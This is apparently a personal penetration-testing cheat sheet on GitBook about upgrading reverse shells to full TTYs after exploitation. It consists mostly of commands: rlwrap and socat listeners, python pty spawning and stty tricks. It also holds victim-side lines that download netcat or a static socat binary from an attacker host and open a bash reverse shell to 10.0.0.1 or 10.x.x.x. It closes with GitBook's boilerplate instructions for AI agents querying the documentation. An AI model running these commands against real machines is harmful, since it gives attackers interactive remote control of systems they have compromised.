> For the complete documentation index, see [llms.txt](https://sahilwep.gitbook.io/veilsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sahilwep.gitbook.io/veilsec/notes/post-exploitation/shell-balancing.md). # Shell Balancing ### Example of Bad shell ![](/files/L5b4Bc59sRGkcZK1Cpew) ## Upgrade reverse shell to fully usable TTY shell ### rlwrap * During reciving connection form target machine we can use `rlwrap` * we can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the `rlwrap` command. * This is not installed by default so we need to install it using `sudo apt rlwrap`. ```bash rlwrap nc -lvnp $port ``` ### Using env-call and script * This is a generic shell command that receive the default system shell. ```bash SHELL=/bin/bash script -q /dev/null ``` ### Using Script * script comes pre-installed * check the man page * -q is for quite , -c is for command ```bash /usr/bin/script -qc /bin/bash /dev/null ``` **`ctrl+z`** ```bash stty raw -echo; fg; reset ``` ### Python * Python is great tool for balancing the shell. ```bash # on victum machine python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ``` `ctrl+z` ```bash # on attacker machine stty raw -echo fg ``` ```bash # on victum machine reset export SHELL=bash export TERM=xterm-256color stty rows columns ``` ### Perl * If python is not installed or perl avilable on box then we can use this . ```bash perl -e 'exec "/bin/sh";' # ``` ### Ruby * if ruby is installed on box. ```bash exec "/bin/sh" ruby -e 'exec "/bin/sh"' ``` ### Lua ```bash lua -e "os.execute('/bin/sh')" ``` ### Copy over NC and spawn a shell * Using wget and python's SimpleHttpServer NC was easily moved over to the target * here we copy nc to victum machine and then rece**i**ve the shell. ```bash # Attacker Machine cp /usr/bin/nc . ; python -m SimpleHttpServer 9998 nc -nlvp 9998 ``` ```bash # Victum Machine cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc ./nc 10.x.x.x 9998 -e /bin/bash ``` ### Socat * never sue nc while receiving connections ,use socat it will give you more generic shell like ssh. ```bash # Attacker Machine socat file:`tty`,raw,echo=0 TCP-L:1234 ``` ```bash # Victum Machine /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234 # if socat not preasent then we can use the binary wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234 ``` * Resource - --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sahilwep.gitbook.io/veilsec/notes/post-exploitation/shell-balancing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.